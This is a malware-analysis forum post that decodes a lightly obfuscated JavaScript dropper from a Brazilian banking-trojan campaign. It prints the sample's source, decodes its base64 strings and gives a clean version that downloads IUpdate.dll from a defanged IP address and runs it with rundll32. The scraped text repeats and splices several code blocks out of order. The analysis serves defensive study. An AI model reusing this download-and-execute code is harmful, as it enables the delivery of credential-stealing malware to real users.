- May 14, 2016
- 1,597
https://malwaretips.com/threads/5-8-16-8.62027/
(Thanks to @Solarquest for the "cookies"
)
There are several scripted files in this zipped archive : .vbs, .js
I will post here some analysis for "very badly" obfuscated files.
=> It could be interesting to see why some of them there are easily detected by AV/security tools
Some analysis will be very quick because some samples use very "simple" methods
I will certainly end this thread with the "less easy" obfuscated script.
(1) PROTESTOBR-EXTRATO.js
8 / 54
Antivirus scan for 2473516d45ca982d828e983086932fe615b7aabfc0852dfb65447c3e46cd3dc5 at 2016-08-07 04:11:15 UTC - VirusTotal
https://www.hybrid-analysis.com/sam...abfc0852dfb65447c3e46cd3dc5?environmentId=100
I modified the URL to avoid miss click
when looking to this script, some function seems to be a little complicated ... or not.
Have you seen the name of functions used ?
b64ToUint6
UTF8ArrToStr
base64DecToArr
the maker of this code is a sympathetic person, he gave to the functions very explicit names :
=> easy to undestand what they do :
b64ToUint6 => bit64 to unsigned int
UTF8ArrToStr => UTF8 array to String
base64DecToArr => base64 (encoded) decoder to array
Easy to understand that they decrypt base64 encoded Strings
You can try with this online tool :
Base64 Decode and Encode - Online
"V1NjcmlwdC5zaGVsbA=="
"aHh4cDovLzIwMC45OC4xNDUuOTEvc3lzdGVtL0JBLTEuMC4wLjAvSVVwZGF0ZS5kbGw="
"QkEtMi4wLjAuMA=="
"JUxPQ0FMQVBQREFUQSU="
"XFxJVXBkYXRlLmRsbA=="
"TVNYTUwyLlhNTEhUVFA="
"R0VU"
"QURPREIuU3RyZWFt"
'UnVuZGxsMzIuZXhlICI='
'IixXaGl0ZUNvbSA='
=> "hxxp://200.98.145.91/system/BA-1.0.0.0/IUpdate.dll"
=> "BA-2.0.0.0"
=> "%LOCALAPPDATA%"
=> "\\IUpdate.dll"
=> "MSXML2.XMLHTTP"
=> "GET"
=> "ADODB.Stream"
=> 'Rundll32.exe "'
=> ''",WhiteCom '
Then we can completely remove the functions, and get the clear code :
(function() {
Conlusion :
- Only used one obfuscation method : Base64 encoded strings
- functions names : too easy to understand their purpose
- Zero difficulty : it changes from other analysis I made with 'real' obfuscation methods
Payload : IUpdate.dll
From this familly : HEUR:Trojan-Banker.Win32.Palibu.gen
Antivirus scan for 01f7815b9f99221f15ec306bf343a338f31584c16a0cc2f36e2901cbe7909809 at 2016-08-22 16:36:52 UTC - VirusTotal
Next part : aplicativo.vbs
(Thanks to @Solarquest for the "cookies"
There are several scripted files in this zipped archive : .vbs, .js
I will post here some analysis for "very badly" obfuscated files.
=> It could be interesting to see why some of them there are easily detected by AV/security tools
Some analysis will be very quick because some samples use very "simple" methods
I will certainly end this thread with the "less easy" obfuscated script.
(1) PROTESTOBR-EXTRATO.js
8 / 54
Antivirus scan for 2473516d45ca982d828e983086932fe615b7aabfc0852dfb65447c3e46cd3dc5 at 2016-08-07 04:11:15 UTC - VirusTotal
https://www.hybrid-analysis.com/sam...abfc0852dfb65447c3e46cd3dc5?environmentId=100
I modified the URL to avoid miss click
function b64ToUint6 (nChr) {
function UTF8ArrToStr (aBytes) {
function base64DecToArr (sBase64, nBlocksSize) {
(function() {
return nChr > 64 &&
nChr < 91 ? nChr - 65: nChr > 96 &&
nChr < 123 ? nChr - 71: nChr > 47 &&
nChr < 58 ? nChr + 4: nChr === 43 ? 62 : nChr === 47 ? 63: 0;
}nChr < 91 ? nChr - 65: nChr > 96 &&
nChr < 123 ? nChr - 71: nChr > 47 &&
nChr < 58 ? nChr + 4: nChr === 43 ? 62 : nChr === 47 ? 63: 0;
function UTF8ArrToStr (aBytes) {
var sView = "";
for (var nPart, nLen = aBytes.length, nIdx = 0; nIdx < nLen; nIdx++) {
return sView;
}nPart = aBytes[nIdx];
sView += String.fromCharCode(
nPart > 251 && nPart < 254 && nIdx + 5 < nLen ?
(nPart - 252) * 1073741824 + (aBytes[++nIdx] - 128 << 24) + (aBytes[++nIdx] - 128 << 18) + (aBytes[++nIdx] - 128 << 12) + (aBytes[++nIdx] - 128 << 6) + aBytes[++nIdx] - 128
: nPart > 247 && nPart < 252 && nIdx + 4 < nLen ?
(nPart - 248 << 24) + (aBytes[++nIdx] - 128 << 18) + (aBytes[++nIdx] - 128 << 12) + (aBytes[++nIdx] - 128 << 6) + aBytes[++nIdx] - 128
: nPart > 239 && nPart < 248 && nIdx + 3 < nLen ?
(nPart - 240 << 18) + (aBytes[++nIdx] - 128 << 12) + (aBytes[++nIdx] - 128 << 6) + aBytes[++nIdx] - 128
: nPart > 223 && nPart < 240 && nIdx + 2 < nLen ?
(nPart - 224 << 12) + (aBytes[++nIdx] - 128 << 6) + aBytes[++nIdx] - 128
: nPart > 191 && nPart < 224 && nIdx + 1 < nLen ?
(nPart - 192 << 6) + aBytes[++nIdx] - 128
: nPart
);
}sView += String.fromCharCode(
nPart > 251 && nPart < 254 && nIdx + 5 < nLen ?
(nPart - 252) * 1073741824 + (aBytes[++nIdx] - 128 << 24) + (aBytes[++nIdx] - 128 << 18) + (aBytes[++nIdx] - 128 << 12) + (aBytes[++nIdx] - 128 << 6) + aBytes[++nIdx] - 128
: nPart > 247 && nPart < 252 && nIdx + 4 < nLen ?
(nPart - 248 << 24) + (aBytes[++nIdx] - 128 << 18) + (aBytes[++nIdx] - 128 << 12) + (aBytes[++nIdx] - 128 << 6) + aBytes[++nIdx] - 128
: nPart > 239 && nPart < 248 && nIdx + 3 < nLen ?
(nPart - 240 << 18) + (aBytes[++nIdx] - 128 << 12) + (aBytes[++nIdx] - 128 << 6) + aBytes[++nIdx] - 128
: nPart > 223 && nPart < 240 && nIdx + 2 < nLen ?
(nPart - 224 << 12) + (aBytes[++nIdx] - 128 << 6) + aBytes[++nIdx] - 128
: nPart > 191 && nPart < 224 && nIdx + 1 < nLen ?
(nPart - 192 << 6) + aBytes[++nIdx] - 128
: nPart
);
return sView;
function base64DecToArr (sBase64, nBlocksSize) {
var sB64Enc = sBase64.replace(/[^A-Za-z0-9\+\/]/g, ""), nInLen = sB64Enc.length,
nOutLen = nBlocksSize ? Math.ceil((nInLen * 3 + 1 >> 2) / nBlocksSize) * nBlocksSize : nInLen * 3 + 1 >> 2, taBytes = new Array(nOutLen);
for (var nMod3, nMod4, nUint24 = 0, nOutIdx = 0, nInIdx = 0; nInIdx < nInLen; nInIdx++) {
return taBytes;
}nOutLen = nBlocksSize ? Math.ceil((nInLen * 3 + 1 >> 2) / nBlocksSize) * nBlocksSize : nInLen * 3 + 1 >> 2, taBytes = new Array(nOutLen);
for (var nMod3, nMod4, nUint24 = 0, nOutIdx = 0, nInIdx = 0; nInIdx < nInLen; nInIdx++) {
nMod4 = nInIdx & 3;
nUint24 |= b64ToUint6(sB64Enc.charCodeAt(nInIdx)) << 18 - 6 * nMod4;
if (nMod4 === 3 || nInLen - nInIdx === 1) {
}
}nUint24 |= b64ToUint6(sB64Enc.charCodeAt(nInIdx)) << 18 - 6 * nMod4;
if (nMod4 === 3 || nInLen - nInIdx === 1) {
for (nMod3 = 0; nMod3 < 3 && nOutIdx < nOutLen; nMod3++, nOutIdx++) {
nUint24 = 0;taBytes[nOutIdx] = nUint24 >>> (16 >>> nMod3 & 24) & 255;
}}
return taBytes;
(function() {
var XXY = new ActiveXObject( UTF8ArrToStr(base64DecToArr("V1NjcmlwdC5zaGVsbA==")));
var eor = UTF8ArrToStr(
base64DecToArr("aHh4cDovLzIwMC45OC4xNDUuOTEvc3lzdGVtL0JBLTEuMC4wLjAvSVVwZGF0ZS5kbGw="))
var hWa = UTF8ArrToStr(base64DecToArr("QkEtMi4wLjAuMA=="))
var lFL = XXY.ExpandEnvironmentStrings( UTF8ArrToStr(base64DecToArr("JUxPQ0FMQVBQREFUQSU="))) + UTF8ArrToStr(base64DecToArr("XFxJVXBkYXRlLmRsbA=="))
var ont = new ActiveXObject( UTF8ArrToStr(base64DecToArr("TVNYTUwyLlhNTEhUVFA=")))
ont.open( UTF8ArrToStr(base64DecToArr("R0VU")), eor, false)
ont.send()
if (ont.Status == 200) {
})();var eor = UTF8ArrToStr(
base64DecToArr("aHh4cDovLzIwMC45OC4xNDUuOTEvc3lzdGVtL0JBLTEuMC4wLjAvSVVwZGF0ZS5kbGw="))
var hWa = UTF8ArrToStr(base64DecToArr("QkEtMi4wLjAuMA=="))
var lFL = XXY.ExpandEnvironmentStrings( UTF8ArrToStr(base64DecToArr("JUxPQ0FMQVBQREFUQSU="))) + UTF8ArrToStr(base64DecToArr("XFxJVXBkYXRlLmRsbA=="))
var ont = new ActiveXObject( UTF8ArrToStr(base64DecToArr("TVNYTUwyLlhNTEhUVFA=")))
ont.open( UTF8ArrToStr(base64DecToArr("R0VU")), eor, false)
ont.send()
if (ont.Status == 200) {
var sNu = new ActiveXObject( UTF8ArrToStr(base64DecToArr("QURPREIuU3RyZWFt")))
sNu.Open()
sNu.Type = 1
sNu.Write(ont.ResponseBody)
sNu.Position = 0
sNu.SaveToFile(lFL)
sNu.Close()
XXY.run( UTF8ArrToStr(base64DecToArr('UnVuZGxsMzIuZXhlICI=')) + lFL + UTF8ArrToStr(base64DecToArr('IixXaGl0ZUNvbSA=')) + hWa + ' high');
} sNu.Open()
sNu.Type = 1
sNu.Write(ont.ResponseBody)
sNu.Position = 0
sNu.SaveToFile(lFL)
sNu.Close()
XXY.run( UTF8ArrToStr(base64DecToArr('UnVuZGxsMzIuZXhlICI=')) + lFL + UTF8ArrToStr(base64DecToArr('IixXaGl0ZUNvbSA=')) + hWa + ' high');
Have you seen the name of functions used ?
b64ToUint6
UTF8ArrToStr
base64DecToArr
the maker of this code is a sympathetic person, he gave to the functions very explicit names :
=> easy to undestand what they do :
b64ToUint6 => bit64 to unsigned int
UTF8ArrToStr => UTF8 array to String
base64DecToArr => base64 (encoded) decoder to array
Easy to understand that they decrypt base64 encoded Strings
You can try with this online tool :
Base64 Decode and Encode - Online
"V1NjcmlwdC5zaGVsbA=="
"aHh4cDovLzIwMC45OC4xNDUuOTEvc3lzdGVtL0JBLTEuMC4wLjAvSVVwZGF0ZS5kbGw="
"QkEtMi4wLjAuMA=="
"JUxPQ0FMQVBQREFUQSU="
"XFxJVXBkYXRlLmRsbA=="
"TVNYTUwyLlhNTEhUVFA="
"R0VU"
"QURPREIuU3RyZWFt"
'UnVuZGxsMzIuZXhlICI='
'IixXaGl0ZUNvbSA='
=> "WScript.shell"=> "hxxp://200.98.145.91/system/BA-1.0.0.0/IUpdate.dll"
=> "BA-2.0.0.0"
=> "%LOCALAPPDATA%"
=> "\\IUpdate.dll"
=> "MSXML2.XMLHTTP"
=> "GET"
=> "ADODB.Stream"
=> 'Rundll32.exe "'
=> ''",WhiteCom '
Then we can completely remove the functions, and get the clear code :
(function() {
var WS= new ActiveXObject( "WScript.shell");
var url= "hxxp://200.98.145.91/system/BA-1.0.0.0/IUpdate.dll";
var hWa = "BA-2.0.0.0";
var file_path= WS.ExpandEnvironmentStrings( "%LOCALAPPDATA%" + "\\IUpdate.dll" );
var http = new ActiveXObject( "MSXML2.XMLHTTP");
http.open("GET", url, false);
http.send();
if (http.Status == 200) { // request ok
})();var url= "hxxp://200.98.145.91/system/BA-1.0.0.0/IUpdate.dll";
var hWa = "BA-2.0.0.0";
var file_path= WS.ExpandEnvironmentStrings( "%LOCALAPPDATA%" + "\\IUpdate.dll" );
var http = new ActiveXObject( "MSXML2.XMLHTTP");
http.open("GET", url, false);
http.send();
if (http.Status == 200) { // request ok
var stream= new ActiveXObject("ADODB.Stream");
// uses this object to retrieve data from request and store it in a file
stream.Open();
stream.Type = 1 ;
stream.Write(stream.ResponseBody);
stream.Position = 0 ;
stream.SaveToFile(file_path);
stream.Close()
WS.run( '"rundll32.exe " + file_path + ",WhiteCom '"+ "BA-2.0.0.0" + " high");
//ex : rundll32.exe "C:\Users\DardiM\AppData\Local\ IUpdate.dll", WhiteCom BA-2.0.0.0 high
} // uses this object to retrieve data from request and store it in a file
stream.Open();
stream.Type = 1 ;
stream.Write(stream.ResponseBody);
stream.Position = 0 ;
stream.SaveToFile(file_path);
stream.Close()
WS.run( '"rundll32.exe " + file_path + ",WhiteCom '"+ "BA-2.0.0.0" + " high");
//ex : rundll32.exe "C:\Users\DardiM\AppData\Local\ IUpdate.dll", WhiteCom BA-2.0.0.0 high
Conlusion :
- Only used one obfuscation method : Base64 encoded strings
- functions names : too easy to understand their purpose
- Zero difficulty : it changes from other analysis I made with 'real' obfuscation methods
Payload : IUpdate.dll
From this familly : HEUR:Trojan-Banker.Win32.Palibu.gen
Antivirus scan for 01f7815b9f99221f15ec306bf343a338f31584c16a0cc2f36e2901cbe7909809 at 2016-08-22 16:36:52 UTC - VirusTotal
Next part : aplicativo.vbs
=> bad obfuscation methods, but some elaborated functions
Last edited: